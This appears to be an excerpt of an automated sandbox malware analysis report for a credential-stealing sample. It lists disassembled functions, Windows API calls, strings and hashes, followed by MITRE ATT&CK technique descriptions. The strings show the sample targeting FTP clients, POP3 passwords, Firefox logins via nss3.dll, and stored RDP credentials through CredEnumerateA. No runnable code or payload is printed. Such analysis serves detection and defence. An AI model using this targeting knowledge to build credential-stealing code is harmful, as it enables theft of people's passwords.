GlobalUnlock.KERNEL32(?), ref: 00401A65
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A6D

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

CRYPTED0YUI1.0, xrefs: 00401A9E

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
String ID: CRYPTED0YUI1.0
API String ID: 4083238039-1217275205
Opcode ID: 696191aca67fa8083aed78348175aa6b89b6b0cdf945d27bbe9b8f0f11fd5a0f
Instruction ID: 98bcc138fbcbd12d775f64776052211cb7bb3b8618e054945259ba3bf34ac07e
Opcode Fuzzy Hash: 696191aca67fa8083aed78348175aa6b89b6b0cdf945d27bbe9b8f0f11fd5a0f
Instruction Fuzzy Hash: E5119775D0010DBBDF026FA5CC429DD7F76AF04348F00817AB914B51B2D77A9BA1AB48

Function 0040F8AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?,0040F8C0), ref: 0040F8D0
GlobalLock.KERNEL32(?), ref: 0040F8F1
GlobalUnlock.KERNEL32(?), ref: 0040F909
StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040F8C0), ref: 0040F924

Strings

STATUS-IMPORT-OK, xrefs: 0040F91C

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Global$FromLockStreamUnlock
String ID: STATUS-IMPORT-OK
API String ID: 2287449323-1591331578
Opcode ID: b7a0542db59541cbd688e6c800188e2b8ff4d7a3e93fbdfba6f53aa871c2d75f
Instruction ID: 99e17a3ffb2fc76985182a1eef3f698a9ca92f73e5691754bebca3514352fc79
Opcode Fuzzy Hash: b7a0542db59541cbd688e6c800188e2b8ff4d7a3e93fbdfba6f53aa871c2d75f
Instruction Fuzzy Hash: 72015B71D0420CBBEF117BA2CD42A9D7B35AB01348F1081BBB850B11B2DA798A959B18

Function 00402272 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

lstrlenA.KERNEL32(?), ref: 00402286
StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Strings

.exe, xrefs: 0040229F

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: .exe
API String ID: 2414487701-4119554291
Opcode ID: 1ad7d085a072468b6d331938eaeb98d3711b458085cd2767c3abbbd9018f3922
Instruction ID: 99d6b5c4ff29a8655c641b4fbf9fa7f465aefd9e6f15d593fc49ab49046486e9
Opcode Fuzzy Hash: 1ad7d085a072468b6d331938eaeb98d3711b458085cd2767c3abbbd9018f3922
Instruction Fuzzy Hash: 23F0C83120428579E72262659D09FAF7F969B93744F24417FF500B62C2DBFCD881927E

Function 0040E465 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

<POP3_Password2, xrefs: 0040E4D3

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: <POP3_Password2
API String ID: 0-2923094552
Opcode ID: 5a60e8d4aa9b4c6c231a7d7f2169547f2d22742aa13a31f4361e0a4d5794f19f
Instruction ID: d6a89ab45ed27c45d4ded46e627d1494df84bfbb3cef63ef7ca6208d75a2edca
Opcode Fuzzy Hash: 5a60e8d4aa9b4c6c231a7d7f2169547f2d22742aa13a31f4361e0a4d5794f19f
Instruction Fuzzy Hash: 3A412E31900019FEDF12ABA2CD018EE7E76AF48358F144937F501B51F1E7798E61ABA9

Function 0040CB96 Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CBC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CBEC
StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC10
lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC32

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC1D

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: ByteCharLocalMultiWidelstrlen$AllocFree
String ID:
API String ID: 1890766102-0
Opcode ID: 934b97756b6a700027879f897ee5652c65a55fe5b21a80c67ea77db47f541946
Instruction ID: 7ab95b7534d6579ed3b9767e0ae932743c93dee75aa345241b3a12643bdaad8a
Opcode Fuzzy Hash: 934b97756b6a700027879f897ee5652c65a55fe5b21a80c67ea77db47f541946
Instruction Fuzzy Hash: 52216F71D44208FFFF116BA1CC86F9E7F75AB04314F20816AB214B91E1D7BD5A909B68

Function 00405A01 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00849868,FTP Navigator), ref: 00405A2F
StrStrIA.SHLWAPI(00849868,FTP Commander,00849868,FTP Navigator), ref: 00405A5D

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

FTP Navigator, xrefs: 00405A29
ftplist.txt, xrefs: 00405A44, 00405A72
FTP Commander, xrefs: 00405A57

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: FTP Commander$FTP Navigator$ftplist.txt
API String ID: 1884169789-2424314702
Opcode ID: 9d5b637c61ab1114d0ce4eb36c77c0bcf70d746fd6fefb9aba9394ac61cb4a81
Instruction ID: 2606a662c771ff84f1f1ce6f5f2d3131c1d725aa632879f6ecdcb132b5d4d674
Opcode Fuzzy Hash: 9d5b637c61ab1114d0ce4eb36c77c0bcf70d746fd6fefb9aba9394ac61cb4a81
Instruction Fuzzy Hash: 9B01C270600505BAEB1177618C42FBF2E59DFC1354F64423BB904B11E2DB7C5E818EAC

Function 0040CE1B Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(0084DAA8,FTPNow), ref: 0040CE42
StrStrIA.SHLWAPI(0084DAA8,FTP Now,0084DAA8,FTPNow), ref: 0040CE53

Strings

FTPNow, xrefs: 0040CE3C
sites.xml, xrefs: 0040CE6C
FTP Now, xrefs: 0040CE4D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: FTP Now$FTPNow$sites.xml
API String ID: 0-284577462
Opcode ID: 837970b7f3a7f33189b44552e6bb287dfb3a738f6fccdb254c5c762cef329e91
Instruction ID: 2c7ace2f0d9e2418dd89fab9b5f8ad072c5ad762fb88618161294aac38493c12
Opcode Fuzzy Hash: 837970b7f3a7f33189b44552e6bb287dfb3a738f6fccdb254c5c762cef329e91
Instruction Fuzzy Hash: 9AF0F470600105B9DB217B71CC42FAF3E664B91754F24033BB918B11E2EBBCCA8196AD

Function 0040C3B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C3D2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C3F4
StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C408

Strings

Settings, xrefs: 0040C425

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$OpenStorage
String ID: Settings
API String ID: 2489594185-473154195
Opcode ID: df1517b52f5387b7e8eabdb854df1a542840954afb3b0f9fafc82675fdbed2bf
Instruction ID: d5202654d815c8f565cfe6d5d5c0b11c79c1bb76e693376a13619458c3235ccb
Opcode Fuzzy Hash: df1517b52f5387b7e8eabdb854df1a542840954afb3b0f9fafc82675fdbed2bf
Instruction Fuzzy Hash: 9731BB3194020AFBEF11AFA1CC42FAEBB76BF44704F208266B610791F1D6759A50AB58

Function 004083A2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

http://, xrefs: 004083F7
https://, xrefs: 00408408

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: http://$https://
API String ID: 0-1916535328
Opcode ID: f69da22e727eef104b2cf716d0f35fe463af5b0edc555dda030fea459c2287d6
Instruction ID: b2a289f5b0d080ed68cf2337ec435f1deb2b55825455c811ff8f7ecc687744aa
Opcode Fuzzy Hash: f69da22e727eef104b2cf716d0f35fe463af5b0edc555dda030fea459c2287d6
Instruction Fuzzy Hash: D041F431800109FADF12AF91DE45BDE7B72AF40308F10817AF951791E1DB798BA0EB59

Function 0040BC36 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85stringCOMMON

Download Yara Rule

APIs

lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BC74
lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040BCA9

Part of subcall function 0040B922: StrStrIA.SHLWAPI(?,() ), ref: 0040B932

Strings

table, xrefs: 0040BCA4
logins, xrefs: 0040BC6C

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: logins$table
API String ID: 3524194181-3800951466
Opcode ID: ada207dc7e3c7ca5c0c09c600882fe7f942b93184df616c64510a39bd239a3fa
Instruction ID: c54da1691fe375ca86dbfa03df4fd5b1e0be1de1bd419b8b10778630d9f833a2
Opcode Fuzzy Hash: ada207dc7e3c7ca5c0c09c600882fe7f942b93184df616c64510a39bd239a3fa
Instruction Fuzzy Hash: 3131B579800209FACF21EF90DC55EDEBB79EF04324F10837BA620B11E0D7799A559B98

Function 0040CA54 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF

StrStrIA.SHLWAPI(?,0041683E), ref: 0040CA93
lstrlenA.KERNEL32(TERMSRV/,?,0041683E), ref: 0040CAA1
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,0041683E), ref: 0040CAB1

Strings

TERMSRV/, xrefs: 0040CA9C, 0040CAA9

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: 99450d30486c2eb03ae9dc29bfeb121ac5eaf57037d9eab8a0d8777cbe7db27c
Instruction ID: b5c285d364a74a17aa2f03974f6d7f612088cde8f552527b4e4b1305b52b2a27
Opcode Fuzzy Hash: 99450d30486c2eb03ae9dc29bfeb121ac5eaf57037d9eab8a0d8777cbe7db27c
Instruction Fuzzy Hash: 9811953141010DFBCF026F65DD829DE3E22AF44358B104526BD15781F1DB7ADAA1AB98

Function 00408E9B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00408EAE
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408ECF

Strings

nss3.dll, xrefs: 00408ED9

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CurrentDirectorylstrlen
String ID: nss3.dll
API String ID: 2713697268-2492180550
Opcode ID: 851c47be65f8092ccf3457e7c8ffd1bf4d804a9e1797c66cabd9e43c28dc92eb
Instruction ID: 491879525ea8b5a8555be9e261d62592d027b06e261381b9593375468cf32869
Opcode Fuzzy Hash: 851c47be65f8092ccf3457e7c8ffd1bf4d804a9e1797c66cabd9e43c28dc92eb
Instruction Fuzzy Hash: E9116130610106EFDB106F70EE49BDA3FA2EB54345F12D03BE445A42A1DBB98896964E

Function 0040CB05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CB44
CredFree.ADVAPI32(00000000), ref: 0040CB8B

Strings

TERMSRV/*, xrefs: 0040CB3F

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: TERMSRV/*
API String ID: 3403564193-275249402
Opcode ID: 0a76474207689e83440903aedac80fd9e73f65f2b0a6c9f942653d54e950e88d
Instruction ID: cd8640c4fb038548bc10826c1b83c39122f29a07020e5201283a44a26fc7190e
Opcode Fuzzy Hash: 0a76474207689e83440903aedac80fd9e73f65f2b0a6c9f942653d54e950e88d
Instruction Fuzzy Hash: 64115B31400209EBDF219F88E88ABDEB7B4EB04304F14867AD541721E1C379BAD4EB99

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

